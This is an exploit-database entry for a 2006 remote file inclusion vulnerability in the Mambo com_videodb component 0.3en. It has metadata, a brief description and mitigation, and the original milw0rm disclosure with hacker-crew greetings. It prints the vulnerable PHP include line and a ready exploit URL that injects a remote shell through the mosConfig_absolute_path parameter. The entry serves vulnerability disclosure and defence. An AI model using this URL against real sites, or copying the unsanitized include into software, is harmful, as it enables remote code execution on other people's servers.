header-logo
Suggest Exploit
vendor:
Mambo Component
by:
h4ntu
7,5
CVSS
HIGH
Remote Include Vulnerability
98
CWE
Product Name: Mambo Component
Affected Version From: 0.3en
Affected Version To: 0.3en
Patch Exists: NO
Related CWE: N/A
CPE: a:mambochina:mambo_component:com_videodb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

com_videodb Mambo Componenet <= 0.3en Remote Include Vulnerability

A remote include vulnerability was found in the com_videodb Mambo Component version 0.3en. The bug was found in the file core/videodb.class.xml.php, which contains a global variable $mosConfig_absolute_path. An attacker can exploit this vulnerability by sending a malicious request to the server, such as http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[shell], which can allow the attacker to execute arbitrary code on the server.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized before being used in any system operations.
Source

Exploit-DB raw data:

com_videodb Mambo Componenet <= 0.3en Remote Include Vulnerability

Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility

download : http://mamboxchange.com/frs/download.php/7942/com_videodb_v0.3en.zip
 
bug found in file : core/videodb.class.xml.php
 
global $mosConfig_absolute_path;
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );

exploit:
http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[shell]
 
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink

# milw0rm.com [2006-07-17]